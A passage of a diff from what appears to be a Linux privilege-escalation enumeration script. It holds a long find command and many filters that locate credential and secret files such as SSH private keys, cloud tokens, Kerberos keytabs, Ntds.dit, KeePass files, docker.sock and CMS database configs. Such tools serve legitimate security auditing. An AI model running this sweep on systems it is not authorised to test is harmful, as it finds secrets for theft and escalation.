\"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + + + wait # Always wait at the end + CONT_THREADS=0 #Reset the threads counter + + #GENERATE THE STORAGES OF THE FOUND FILES + PSTORAGE_SYSTEMD=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/lib32|^$GREPHOMESEARCH|^/system|^/lib|^/sys|^/var|^/cdrom|^/etc|^/lib64|^/tmp|^/snap|^/applications|^/media|^/srv|^/systemd|^/mnt|^/run|^/private|^/sbin|^/opt|^/bin|^/.cache|^/usr" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/lib32|^$GREPHOMESEARCH|^/system|^/lib|^/sys|^/var|^/cdrom|^/etc|^/lib64|^/tmp|^/snap|^/applications|^/media|^/srv|^/systemd|^/mnt|^/run|^/private|^/sbin|^/opt|^/bin|^/.cache|^/usr" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/lib32|^$GREPHOMESEARCH|^/system|^/lib|^/sys|^/var|^/cdrom|^/etc|^/lib64|^/tmp|^/snap|^/applications|^/media|^/srv|^/systemd|^/mnt|^/run|^/private|^/sbin|^/opt|^/bin|^/.cache|^/usr" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA\n$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "mysql$|debian\.cnf$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) + PSTORAGE_APACHE=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA\n$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "sites-enabled$|000-default\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/tmp|^/mnt|^/var" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) + PSTORAGE_DRUPAL=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E '/default/settings.php' | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_MOODLE=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E 'moodle/config.php' | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "config\.php$" | sort | uniq | head -n 70) + PSTORAGE_TOMCAT=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) + PSTORAGE_MONGO=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) + PSTORAGE_SUPERVISORD=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CESI=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) + PSTORAGE_RSYNC=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) + PSTORAGE_HOSTAPD=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_VNC=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA\n$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) + PSTORAGE_LDAP=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "ldap$" | sort | uniq | head -n 70) + PSTORAGE_OPENVPN=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) + PSTORAGE_SSH=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) + PSTORAGE_CERTSB4=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) + PSTORAGE_CERTSBIN=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) + PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) + PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) + PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^$GREPHOMESEARCH|^/usr" | grep -E "ssh.*config$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA\n$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) + PSTORAGE_KERBEROS=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$" | sort | uniq | head -n 70) + PSTORAGE_KIBANA=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_KNOCKD=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) + 